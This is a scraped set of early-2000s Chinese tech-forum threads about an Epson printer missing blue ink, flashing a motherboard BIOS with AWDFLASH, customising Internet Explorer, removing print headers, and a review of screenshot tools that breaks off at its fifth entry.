 发表于 2002-01-08 19:04:37 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
今天数了一下打印的图片的数量，发现共打了十九张A4的图片，而且基本上是以蓝色居多。所以可能没有墨的可能性比较大。

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
飞速键盘

初级用户
积分：0
发帖：236
来自：HN-SZ
注册：2001-04-18
 发表于 2002-01-08 19:05:48 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
还有一问，买此墨之前，主管还买了两个墨盒，也是爱普生的，包装不同。
打印出来颜色不正，偏红。检查喷嘴，只有红与黑。
后来就换了这个，所以才打得出十九张颜色正常的图片。
现在这个打不出蓝墨了，但还有黑红黄三种色
于是换了个那种不正常的包装的新墨盒，却又只红与黑。
是不是次品？有没有碰到过这种情况？

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
蓝色

管理员|蓝色
积分：13787
发帖：5829
来自：China
注册：2000-06-16
 发表于 2002-01-08 19:14:56 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
http://news.cn.tom.com/Archive/2001/11/22-31186.html

子曰：无欲速，无见小利。欲速则不达，见小利则大事不成。

Blueidea Web Team
Team Leader

飞速键盘

初级用户
积分：0
发帖：236
来自：HN-SZ
注册：2001-04-18
 发表于 2002-01-09 13:31:30 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
蓝色在上个帖子中说
引用:
http://news.cn.tom.com/Archive/2001/11/22-31186.html

哇，坑害消费者。这一个月我们公司就换了四个彩色墨盒和一个黑色墨盒了。

那怎么会出现新墨盒缺色的情况呢？也是质量问题吗？

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
MCS2000

终级用户
积分：913
发帖：302
来自：HEBEI
注册：2001-03-09
 发表于 2002-01-10 09:53:14 按此观看MCS2000的个人资料 按此发邮件给MCS2000 访问MCS2000的主页 发送悄悄话给MCS2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MCS2000的IP
估计你是没墨了。如果是喷头堵了可以用纯净水冲洗，最好有专业人员指导。

爱普生的墨盒是很害人的。

~~~主页全新改版~~~

---+++--http://mcs2000.yeah.net---+++--

上一贴 | 下一贴
快速回复 | 主题：蓝色的朋友，我的EPSON打印机打不出蓝色啦！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎么样更新主板的bios？

计算机技术
怎么样更新主板的bios？

上一贴 | 下一贴
发表人 主题: 怎么样更新主板的bios？
netant

终级用户
积分：587
发帖：517
来自：欠发达地区
注册：2001-05-14
 发表于 2002-01-16 12:12:01 按此观看netant的个人资料 按此发邮件给netant 访问netant的主页 netant 的 oicq 是64188400,查看 64188400 的资料 收藏该主题供以后查看 发送悄悄话给netant 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看netant的IP
谢谢

我发现我上次用的签名档太没有个性了
ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2002-01-16 12:15:10 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
下载一个BIOS刷新文件，bin文件。然后进入dos实模式开始刷新

好好学习，努力做事
wolfchen2000

苯苯狼
积分：711
发帖：490
来自：上海
注册：2000-10-04
 发表于 2002-01-16 12:21:54 按此观看wolfchen2000的个人资料 按此发邮件给wolfchen2000 访问wolfchen2000的主页 wolfchen2000 的 oicq 是8405200,查看 8405200 的资料 发送悄悄话给wolfchen2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wolfchen2000的IP
操作是很方便的，但一定要心细,最好有一定的dos基础
先确认你主板的型号,下载相应的bios驱动,一般里面有一个bios刷新程序(象AWARD的BIOS通常是叫一个AWDFALASH的),在纯DOS下运行这个程序,----新bios可以放在软盘上,也可以在硬盘,执行后,会提示你保存现在的BIOS,保存后用新的覆盖即可.
切记:中间不要断电;
用软盘的话先检查软盘;
要在纯DOS下运行刷新程序

灯光熄灭了,音乐静止了
滴下的眼泪已经停不住了
天下起雨了,人是不快乐
我的心是真的受伤了

len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-16 13:16:26 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
1.确定主板的各种型号:在你下载BIOS之前,你要明确你的主板是哪个版本,刷错BIOS 可能会毁掉你的主板.
(1)从主板标识上来确认主板的型号.
(2)在系统启动时确认BIOS的版本.
(3)用BIOS测试软件,如ctbios检测.
2.刷新BIOS的步骤:
(1)下载版本正确的xxxxx.zip文件并解压它.
(2)准备一张DOS 6.2X 版本的启动盘(或 Windows 95/98 DOS 的启动盘), 盘中不带AUTOEXEC.BAT 和CONFIG.SYS文件,然后把以上文件（xxxxx.BIN文件和 AWDFLASH.EXE 工具软件)存到盘中.
进入BIOS 设置,记下先前你改动过的任何设置,然后在LOAD SETUP DEFAULT 这项中恢复.在BIOS 特性设置中,设置“Boot Sequence”为“A,C,SCSI”,并在 CHIPSET FEATURE SETUP 中将‘System BIOS Cacheable'设为Disable.如果主板有BIOS防改写功能,还要把此项功能关闭.
(3)重启,让系统由启动盘启动,然后在DOS 状态下键入以下命令: A:\>AWDFLASH xxxxx.BIN ( 回 车 )
屏幕上首先提示的问题是你是否需要把原来的BIOS从系统中存入文件中,你可以选择“N”,因为原 来的BIOS 文件在随主板出售时已带在随机盘中. 第二问题需要你确认升级BIOS,你只需按“Y”即可确认. 一旦BIOS升级后,你需要关机以后再开机一次.
(4)重新进入BIOS设置状态,进入设置缺损这项,把你以前记下的设置变动恢复过来.
存盘并退出BIOS设置,然后让系统重新启动.
刷BIOS可能出现的问题:
没有显示,但是从机中还是能听到一些嘀嘀声,而且软驱也是好的,那么说 不是所有BIOS内的东西都丢失了.你可以试用以下方式来恢复到原来状态:
准备一张刚才提到的启动盘,带有FLASH 工具和BIOS 文件;
在盘中用以下命令做一个AUTOEXEC.BAT文件: AWDFLASH xxxxx.BIN /SN /PY
选项/SN/PY 可以自动回答一般情况下你必须回答“不”或“是” 的问题,在这种情况下系统会由 软盘启动,编程BIOS并自动重新启动,但系统会用一段时间来运行程序,不要关机,等待系统重新启动。
如果你想看实际效果如何,你可以找一块ISA显示卡替代PCI或AGP显示卡 ,如果你没有ISA显示卡, 你还可以在黑屏状态下刷BIOS(黑屏时,BIOS可以由前面提到的驱动盘自动刷BIOS),在主板自动重 启后,拿出软盘,你的主板状态也恢复正常了.

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：怎么样更新主板的bios？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


用什么修改IE右上的那个难看的带着窗户还一直转的地球

计算机技术
用什么修改IE右上的那个难看的带着窗户还一直转的地球

上一贴 | 下一贴
发表人 | 主题: 用什么修改IE右上的那个难看的带着窗户还一直转的地球
浸食·花葬 极度色郎 积分：7374 发帖：2638 来自：|翅膀| 注册：2001-07-09 | 发表于 2001-12-05 14:24:03 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 收藏该主题供以后查看 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP 改注册表可以吗？ 我不知道它的键值再什么地方 或者有第三方软件修改的吔行 ··· 谢谢 ！ 幕末 —— 京都に人斬り拔刀齋と呼ばれた志士がぃた. 修羅さながらに人を斬り.その血刀を以って新 時代『明治』を切り拓ぃたその男は.動亂の 終結と共に人々の前から姿を消した ——
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-05 14:34:55 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 最老土的办法，进你的系统文件夹，如c:\windows\，再按f3,在查找栏中输入 *.gif，应该有这个东西的，再用同名的，大小和颜色相同的代替就可以了：0 WINDFLASH ::浅紫色FORUM::
浸食·花葬 极度色郎 积分：7374 发帖：2638 来自：|翅膀| 注册：2001-07-09 | 发表于 2001-12-05 14:51:33 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP win2000 server sp3 我在 winnt 目录下搜*.gif 搜出260个文件 ........... 又别的办法吗 幕末 —— 京都に人斬り拔刀齋と呼ばれた志士がぃた. 修羅さながらに人を斬り.その血刀を以って新 時代『明治』を切り拓ぃたその男は.動亂の 終結と共に人々の前から姿を消した ——
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-05 18:39:05 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 再用acdsee查看啊！~不是很多啊 WINDFLASH ::浅紫色FORUM::
arrive 终级用户 积分：1231 发帖：410 来自：大连 注册：2000-12-02 | 发表于 2001-12-05 21:37:20 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP IES这个软件，FREE的 Нельзя выпустить из руквозможностъ,которая случается в жизнь.
arrive 终级用户 积分：1231 发帖：410 来自：大连 注册：2000-12-02 | 发表于 2001-12-05 21:37:21 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP IES这个软件，FREE的 Нельзя выпустить из руквозможностъ,которая случается в жизнь.
randomix 小 乱 积分：4642 发帖：1647 来自：亂度謎城 注册：2000-11-30 | 发表于 2001-12-06 01:18:38 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP IEAK，微软网站有下，官方软件，定制整个IE的。 always ran...
arrive 终级用户 积分：1231 发帖：410 来自：大连 注册：2000-12-02 | 发表于 2001-12-10 18:42:13 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP http://nj.onlinedown.net/IEAK.HTM 这个地址！ Нельзя выпустить из руквозможностъ,которая случается в жизнь.
arrive 终级用户 积分：1231 发帖：410 来自：大连 注册：2000-12-02 | 发表于 2001-12-10 18:43:56 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP 只能用在IE6.0上 Tweak IE结合了许多让IE跑得更顺畅的功能，还有一些好玩的设定，让你执行IE和Outlook Express时会有不一样的感受。具有多项功能、使用简单，让你调整IE的cache和history，还可以自动更新程序。IESweep让你不用重新启动系统就能清理cache、history和windows的暂存文件、更改。DAT文件，IESweep也能自动或定期清理文件（如开机时执行）。Cache Explorer让你浏览你的Internet cache文件，找出HTML文件、图形和声音文件－Cache Explorer提供预览视窗让你直接看文件内容。你也可以直接将Outlook Express产生的email、news文件删除。Tweak IE让你设定启动＼关闭cache、改变标题栏文字、关闭Outlook Express启动画面等。 [这消息被arrive编辑过(编辑时间2001-12-10 18:44:17)] Нельзя выпустить из руквозможностъ,которая случается в жизнь.
上一贴 | 下一贴
快速回复 | 主题：用什么修改IE右上的那个难看的带着窗户还一直转的地球
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何去除打印html页面时的标题，页码和时间？

计算机技术
如何去除打印html页面时的标题，页码和时间？

上一贴 | 下一贴
发表人 | 主题: 如何去除打印html页面时的标题，页码和时间？
hedgehog 终级用户 积分：829 发帖：370 来自： 注册：2000-08-24 | 发表于 2001-12-17 14:11:22 按此观看hedgehog的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给hedgehog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hedgehog的IP 碰到网上比较好的资料就想打印出来。可在浏览器中点击“打印”后，打出来的带有页面标题，页码，打印时间，等附加的东西，这些我如果不想在打印的时候出现，该怎么做？打印机属性里面好像找不到这些设置？ 如果是在ACDSEE里面打印图象的话，可以设置不出现文件名，至于Html格式的资料我就不知道该怎么设置了。 麻烦高手指点！ 什么是爱情？给我一次体验的机会...
POPOEVER N个蓝色大泡泡 版主 积分：19175 发帖：5030 来自：Keyframe G.L 注册：2000-07-17 | 发表于 2001-12-17 16:10:47 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP IE-->"文件"菜单-->页面设置-->页眉、页脚里的东东都删掉 XTree 无可救药地活着，睡眼朦胧地醒着 Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
hedgehog 终级用户 积分：829 发帖：370 来自： 注册：2000-08-24 | 发表于 2001-12-17 16:31:29 按此观看hedgehog的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给hedgehog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hedgehog的IP 谢谢！ 什么是爱情？给我一次体验的机会...
上一贴 | 下一贴
快速回复 | 主题：如何去除打印html页面时的标题，页码和时间？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问：你们是用什么软件东西截图的？

计算机技术
请问：你们是用什么软件东西截图的？

上一贴 | 下一贴
发表人 主题: 请问：你们是用什么软件东西截图的？
傻看着你

超级用户
积分：397
发帖：124
来自：
注册：2001-11-29
 发表于 2001-12-14 10:05:05 按此观看傻看着你的个人资料 按此发邮件给傻看着你 收藏该主题供以后查看 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
我看大家都可以把自己在电脑上做的范例帖出来，请问用的是什么软件呀？我想学
aoczone

初级用户
积分：52
发帖：41
来自：
注册：2000-10-20
 发表于 2001-12-14 10:08:31 按此观看aoczone的个人资料 按此发邮件给aoczone 发送悄悄话给aoczone 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看aoczone的IP
直接按print screen

嘿嘿
傻看着你

超级用户
积分：397
发帖：124
来自：
注册：2001-11-29
 发表于 2001-12-14 10:22:04 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
我不太懂耶，能不能说详细点？
caience

冬天是红色
积分：2644
发帖：2438
来自：小城淄博
注册：2000-10-20
 发表于 2001-12-14 10:38:45 按此观看caience的个人资料 按此发邮件给caience 访问caience的主页 发送悄悄话给caience 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看caience的IP
直接按print screen sysRQ
然后随便一个画图就可以pasle

GUOGUO & MUMU
=NICEMOOD= CS team awper: caience
myhyli

现任版主
积分：20379
发帖：4790
来自：
注册：2000-07-22
 发表于 2001-12-14 10:44:37 按此观看myhyli的个人资料 按此发邮件给myhyli 发送悄悄话给myhyli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看myhyli的IP
alt+printscreen
截窗口的

Myhyli
www.blueidea.com/user/myhyli

Blueidea Web Team
Moderator Of Dreamweaver & Javascript

tntst

高级用户
积分：233
发帖：184
来自：广州
注册：2000-07-23
 发表于 2001-12-14 10:49:25 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP
hypersanp DX 4.21

下载网址：http://www8.pconline.com.cn/download/swdetail.phtml?id=581

看看快捷键，也可以自定义快捷键，很容易操作!

适合写教程！

我的教程都是用它来抓图的。

[这消息被tntst编辑过(编辑时间2001-12-14 10:50:59)]

***>> TNTST <<***
-----------------------------------
投稿信箱：tntst@pconline.com.cn
网址： http://www.pconline.com.cn/pcedu
MM MX：[url]http://www.pconline.com.cn/pcedu/redian/mx/[
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-14 12:28:04 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
为windows的画图设好快捷键！更好用！

按两下就搞定了！

现在抓图的软件好多的！
相信很多朋友在工作时都需要使用一些图形图像，无论是搞科研还是作家、编辑，或是商业应用，都离不开各种各样的图片资料。当然，这些资料可以通过扫描、照相或通过计算机绘制来取得，但灵活运用各种抓图工具来获取图像则不失为一种好办法。现在大家常用的抓图软件有很多种，我在这里选了一些网上常见的抓图软件为大家做一个简单介绍。这里不仅有捕捉单帧图像的软件，还有动态捕捉图像制成动画片断的软件。熟练运用这些软件可以使你的文章和报表更加精彩，制作自己的个性节日卡片，甚至可以制作一个软件的教学示范程序或者一个动画的游戏攻略。好了，闲话休提，我们一个一个来仔细观瞧。

一、CaptureEze97
下载网址：http://www.screencapture.com
CaptureEze97（以下简称CE97）是一个捕捉静态图像的软件。运行CE97，开始界面上有说明栏和三个命令按钮，分别是电子邮件支持、打印订购单和继续。单击继续，如果你用的是试用版，则会出现当前注册信息和使用的天数，再单击[OK]后就到了程序界面了。CE97提供了多种捕捉屏幕图像的途径和对已存在图像进行修改的工具。在程序界面里，会出现以下五个选项。
1.在打印图片之前预览和调整已捕捉的图片。
2.自动打印捕捉的图片。
3.自动将捕捉的图片保存成文件。
4.打开或从扫描仪、数字相机上获取一个已存在的图像，打印、修改、预览或输出。
5.打印一组图片或从扫描仪、数字相机上获取一组图片。
下面分别解说每一选择后的工作步骤。
1.预览和调整已捕捉的图片。当选这一项后会出现捕捉屏幕功能选择，在这里可以选择捕捉整个屏幕、活动窗口、活动窗口的应用程序区域、一个自动翻滚的国际互联网页、捕捉一个你定义的矩形空间、指定屏幕上的一个物体和全屏DOS状态下的图像捕捉。在这7个选项下面有设置捕捉热键、设定是否捕捉光标、是否隐藏CE的图标、设定连续捕捉次数及每次间隔时间等设置，其中值得特别说明的是：a.捕捉网页。当用PrintScreen键激活时会在应用程序中让你选择要捕捉的窗口，即使这窗口是一篇很长的网页CE也会毫不费力地全部捕捉下来。另外，不只是浏览器可以使用这一功能，资源管理器等窗口均可使用这一功能。选择一个窗口，CE就会把其中的图像，文字等全部捕捉下来，很过瘾的！b.捕捉一个你定义的矩形空间。当你用PrintScreen键激活捕捉功能时，光标会变成一个十字形状，这时你按住左键，会拉出一个矩形空间，可以在任一位置以任意大小准确捕捉这一矩形空间中的内容。 2.自动打印捕捉的图像。当选择这一功能时，出现三个标签式选择窗，在Image选择窗中设定打印图像尺寸是自定义还是自动打印，打印是居中、靠左还是靠边上，以及页边距尺寸；在Option选择框中设定是否给图像加边框、阴影及它们的颜色属性，并且可以调整图像的明暗度。另外你还可以设置以彩色方式、黑白方式或灰度方式打印和打印份数；在Setup选择窗中可以选择打印机、打印方向和打印纸张大小。在全部设置完成后，按窗口底部的[Next]，即出现捕捉屏幕功能选择，这和前面介绍的完全一样，只是前者捕捉完图片后自动出现编辑工具，而自动打印捕捉图像是在捕捉完图片后自动打印而已。
3.自动保存捕捉的图像。当你选择这一功能并按下[Next]按钮时，程序会出现存储文件对话框，其中有所存文件名称及路径，还有一个功能选择项，让你选择是否在保存捕捉图像前显示文件名称和同意保存、更改或取消保存或不提示任何信息，直接在前一储存文件名后面加“1”保存。在设置完所有选项后按[Next]按钮，又会出现捕捉屏幕功能，选择用法同前面一样，在此不再多谈。
4.打开或从扫描仪、数字相机上获取一个已存在的图像。这相当于一个图像处理软件，可以进行简单的图像修改操作。在File区中可以打开或存储图像；在Printer区中可以打印和设置页面；在Borders区中可以设置边框及阴影的宽度和颜色；在Effect区中可以改变色彩，调节亮度，黑白反转，色彩级数调整，转化成灰度图像，彩色反转，以及在图片上打字；在Size区中可以调整图片大小；在Position区可以调节图像居中和左右边距；在Image区可以旋转图像和对图像进行镜像操作，以及对图像进行剪切。
5.打印一组图片或从扫描仪、数字相机上获取一组照片：这个功能简单多了，就是把一组图片打印在一张纸上，你可以选择为每个图片加名称，日期，大小等说明文字。
总的来讲，CaptureEze97是一个很不错的抓图工具，它的功能强大而且简单易懂，每一个功能条都会有一幅说明性的图像和说明文字，很便于掌握，简单的图像处理能提供大部分需要的功能。

二、HardCopy Pro
下载网址：http://www.desksoft.com
一接触这个软件，我就被它的小巧吸引住了，好几个文件才200K的空间，而且功能也很多。运行主程序后出现一个小窗口，又是标签式窗口（这几乎成了当前全球流行样式了），它分成Action、Option、Edit/Save、Print几个项目，下面分别道来。
Action：这是一个常用操作命令，包括按快捷键捕获屏幕、保存、拷贝、编辑、打印图像、对图像进行剪切等操作。当你按下快捷键（PrintScreen）时，Action窗口的预览窗口中就会出现你要捕捉的画面。你可以用[Adjust]按钮进行剪切调整，然后存盘或打印。 Option：有许多选项供你选择。例如，在GeneralOption区中可以选择是否自动运行程序，是否在工作中隐藏HardCopy Pro；在Capture区中可以设置捕捉方式，矩形捕捉方式是捕捉你在屏幕上指定范围内的图像，Windows方式是捕捉你指定的窗口，Activellind方式是捕捉当前激活的窗口，Screen方式是捕捉整个屏幕；在Hotkey区中可以设置捕捉图像的热键和隐
藏激活HardCopy Pro的热键；在DefaultAction区中可以设置捕捉图片命令后的缺省命令，这里有另存为、保存、拷贝、编辑、打印、调整等，当你选择其中一项时，在抓图过程后程序就会紧接着执行你设定的命令；在Default Color Mode区中可以设置缺省颜色级数；在Monitor Size中可设定当前显示器尺寸。
Edit/Save：在这个窗口内可以设置所用的图像编辑软件。这是HardCopy Pro十分有趣的一点，它的体积很小，不提供编辑器，但可以嵌入你常用的编辑器，如Photoshop、CorelDraw等等，可在抓图后直接调用这些软件进行后期加工。在Edit选项下有连续存储功能设置，这里你可以为连续图片储存设置文件名和路径。
Print：在这个窗口中可以设置打印机、打印尺寸、打印位置、页边距等等，十分简单。

HardCopy Pro是Win 95/98/NT下的一个强大的抓图软件，并且小巧可爱，你可以随身携带，到处抓图。

三、Capture Professor
下载网址:http://www.creativesoftworx.com
这个软件怎么看都象是一个简单的Photoshop图像处理软件。许多Photoshop的滤镜这里都有，一旦捕获图片后，左边就出现了一大群绘图工具，下方显示当前调色板，什么选择工具、画笔、吸管、喷笔、橡皮擦等等一应俱全。它不仅编辑图像的功能很强大，抓图功能也是无与伦比的，不但可以进行常规的捕捉活动窗口、图标、桌面、按钮、网页等等，而且还可以捕捉菜单、椭圆区域、多边形区域、指针、多重窗口，怎么样，够厉害吧！下面我们打开软件包看看。还好，这不是一个标签窗口式的软件，而是标准的菜单型视窗。在工作区上部是菜单栏，其中File、Edit、View、Help都是非常熟悉的啦，这里只讲讲Capture和Macro
的特色。
点中Capture，会出现许多捕捉视图选项。Capture Professor不象其它抓图软件一样只用一个热键，它把每一种方式都定义了一种快捷键，从上到下，一共是十三种抓图方式，够酷！如果你嫌这样抓图不方便，或是搞不懂，那么请看，最下面还有“Menu Capture Wizard”（菜单抓图向导)、“Capture Wizard”（一般抓图向导）。这两个选项可以让你在一步一步的提示下轻松抓取图片。在Macro菜单中你可以录制一系列操作，记录成一个“宏”，就象一个批处理命令，当你对多个操作对象进行同一操作时非常有用。 在菜单栏下面是工具栏，这里有许多常用工具，如新建、打开、存储、从扫描仪上获取、打印图像、选择各种抓图模式以及选择是否加入时间延迟、是否捕捉鼠标指针、捕捉完直
接保存、打印或转到剪贴板上，还有色彩级数转换、图片大小改变、亮度对比度调节、锐化及模糊、剪切、旋转、录制宏等。
当你捕捉完成一幅图像后，整个工作区就变成了一个图像编辑器，在菜单栏上出现Operation和Effect菜单项。Operation主要进行图片边框设定、调色板设定以及图像转换、剪切、翻转、旋转、缩放和层的操作等等。Effect菜单项中主要是一些效果命令，如模糊工具、浮雕工具、锐化工具、色彩及边缘的调整等一系列如Photoshop滤镜一样的工具。在图像工作区的左侧则出现了许多绘图工具，如刷子、吸管、选取工具等。当点取某一工具时，工具条下方会出现更详细的参数选择，任你尽情发挥。
Creativesoftworx公司有Capture LITE和Capture Professor两种抓图软件，而Capture Professor的功能则要强大得多，值得朋友们一试！

四、HyperCam
下载网址：http://www.hyperionics.com
HyperCam实际就是Hyper Camera的缩写，意思是超级摄像机。它可确确实实是一架超级摄像机，能在Win 95/NT下捕捉屏幕影像和声音，并以AVI格式保存。用HyperCam可以轻易做出一个软件的教学示范程序，甚至做出一个动画的游戏攻略。这时你的秘技将不再是难以懂得的蝇头小楷，而是真正过关斩将时的雄姿，把你所有的攻关技巧用HyperCam录下，汇编成一张光盘就能够发表了，怎么样，先来试试看吧？ 打开HyperCam，出现了一个小巧的窗口，上部是五个层叠的标签式窗口（又是标签窗口！），底下是六个命令按钮。我们从上面看：
1.Screen Area：屏幕区域选择窗。在这里你可以任意选择你想录下来的屏幕区域，可以是任意一个矩形，也可以是一个窗口，并且可选择当捕捉时是否在捕捉区域周围显示闪烁的框线，捕捉时HyperCam是仍旧打开还是缩成图标，或隐藏起来等。
2.Hot Keys：热键选择窗。在这里选择“开始/停止”、“暂停/继续”或是“捕捉单帧图像”的快捷键，系统默认这几种快捷键分别是F2、F3和F4。另外，在这里还可以设定捕捉移动热键，系统默认Shift+Ctrl+鼠标拖动会移动捕捉区域。
3.AVI File：AVI文件设置窗。这里设置是否每段动画自动追加名字、是否录音、每秒录
制帧数、回放帧数、关键帧帧数、AVI文件压缩率、压缩算法等。
4.Sound：声音设置窗。这里设置声音的比特数和采样频率。
5.License：许可证明。这里有一些版权声明和注册信息等等。
程序底部的六个命令按钮分别是“开始/停止”、“暂停/继续”、“回放”、“设置缺省值”、“帮助”和“退出”，这些都很好理解，一旦按下“开始”，你在屏幕上做的一切都将成为“电影”了。HyperCam的功能强大，在于它可以自由设置捕捉区域，而其它一些动态捕捉软件则只能捕捉全屏图像。另外，HyperCam还有许多命令行参数，这说明它可以编在
一个批处理文件里，和其它程序同时运行。例如：“HyperCam -rec -x50 -y50 -w200 -h200 -a tewp.avi”。HyperCam还可以作为一个链接嵌入对象被其它程序所控制。例如Visual Basic，具体方法在说明中有详细介绍，这里就不多讲了。总之，这个才800K的软件让我感到非常非常的满意！

五、Flash 32
下载网址：http://perso.infonie.fr/chass/
